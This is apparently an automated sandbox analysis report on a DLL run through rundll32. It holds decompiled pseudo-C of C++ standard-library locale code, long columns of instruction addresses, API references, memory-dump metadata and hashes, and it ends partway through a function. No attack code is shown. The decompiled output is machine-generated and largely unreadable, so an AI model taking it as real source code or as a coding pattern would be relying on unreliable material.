																																																													 *(_t946 - 4) = 1;
																																																													E6E206FD3(__eflags, _t899);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6e2c6dcc = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6E206FD3(__eflags, _t898);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6e2c6dfc = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6E206FD3(__eflags, _t897);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6e2c6de0 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6E206FD3(__eflags, _t896);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6e2c6ddc = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6E206FD3(__eflags, _t895);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6e2c6db0 = _t895;
																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6E206FD3(__eflags, _t894);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6e2c6dd8 = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6E206FD3(__eflags, _t893);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6e2c6dc4 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6E206FD3(__eflags, _t892);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6e2c6dc8 = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6E206FD3(__eflags, _t891);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6e2c6df4 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6E206FD3(__eflags, _t890);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6e2c6df8 = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6E206FD3(__eflags, _t889);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6e2c6dc0 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6E206FD3(__eflags, _t888);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6e2c6df0 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6E206FD3(__eflags, _t887);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6e2c6dbc = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6E206FD3(__eflags, _t886);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6e2c6dec = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6E206FD3(__eflags, _t885);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6e2c6db8 = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6E206FD3(__eflags, _t884);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6e2c6de8 = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6E206FD3(__eflags, _t883);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6e2c6dd4 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6E206FD3(__eflags, _t882);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6e2c6db4 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6E206FD3(__eflags, _t881);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6e2c6de4 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}





































































                          0x6e20ef91
                          0x6e20ef91
                          0x6e20ef98
                          0x6e20efa2
                          0x6e20efa7
                          0x6e20efb2
                          0x6e20efb6
                          0x6e20efb9
                          0x6e20efbe
                          0x6e20efc2
                          0x6e20efc7
                          0x6e20efcb
                          0x6e20f010
                          0x6e20f013
                          0x6e20f01f
                          0x6e20efcd
                          0x6e20efcf
                          0x6e20efd5
                          0x6e20efdb
                          0x6e20efe3
                          0x6e20efe6
                          0x6e20f023
                          0x6e20f031
                          0x6e20f036
                          0x6e20f03e
                          0x6e20f048
                          0x6e20f04d
                          0x6e20f058
                          0x6e20f05c
                          0x6e20f05f
                          0x6e20f064
                          0x6e20f06d
                          0x6e20f06f
                          0x6e20f071
                          0x6e20f0b6
                          0x6e20f0b9
                          0x6e20f0c5
                          0x6e20f073
                          0x6e20f073
                          0x6e20f075
                          0x6e20f07b
                          0x6e20f081
                          0x6e20f089
                          0x6e20f08c
                          0x6e20f0c9
                          0x6e20f0d7
                          0x6e20f0dc
                          0x6e20f0e4
                          0x6e20f0ee
                          0x6e20f0f3
                          0x6e20f0fe
                          0x6e20f102
                          0x6e20f105
                          0x6e20f10a
                          0x6e20f113
                          0x6e20f115
                          0x6e20f117
                          0x6e20f15c
                          0x6e20f15f
                          0x6e20f16b
                          0x6e20f119
                          0x6e20f119
                          0x6e20f11b
                          0x6e20f121
                          0x6e20f127
                          0x6e20f12f
                          0x6e20f132
                          0x6e20f16f
                          0x6e20f17d
                          0x6e20f182
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b9
                          0x6e20f1bb
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075
                          0x6e20efe8
                          0x6e20efe8
                          0x6e20efeb
                          0x6e20efef
                          0x6e20eff3
                          0x6e20f000
                          0x6e20f008
                          0x6e20f00a
                          0x00000000
                          0x6e20f00a
                          0x6e20efd1
                          0x6e20efd1
                          0x00000000
                          0x6e20efd1
                          0x6e20efcf

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20EF98
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20EFA2
                          • int.LIBCPMT ref: 6E20EFB9
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E20EFDC
                          • std::_Facet_Register.LIBCPMT ref: 6E20EFF3
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F013
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F031
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID:
                          • API String ID: 2363045490-0
                          • Opcode ID: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
                          • Instruction ID: 5c9b8f76120b1df9aeff51c5084e6e907daec447d121e33e8a8055deb2c3d2f3
                          • Opcode Fuzzy Hash: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
                          • Instruction Fuzzy Hash: BA11E37591051D8BCF00DBE0C894AEEB77BAF44715F140909E510AB2D0DFB4AA40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BA8A, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E21BA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t154 - 0x14, 0);
				_t147 =  *0x6e2c6e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1E161C(0x6e2c6e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E2066BA(_t154 - 0x14);
					return E6E220075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E21C1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t154 - 0x20);
							E6E223D74(_t154 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t143, _t147, 0x14);
							E6E206653(_t154 - 0x14, 0);
							_t148 =  *0x6e2c6e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1E161C(0x6e2c6e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E2066BA(_t154 - 0x14);
								return E6E220075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
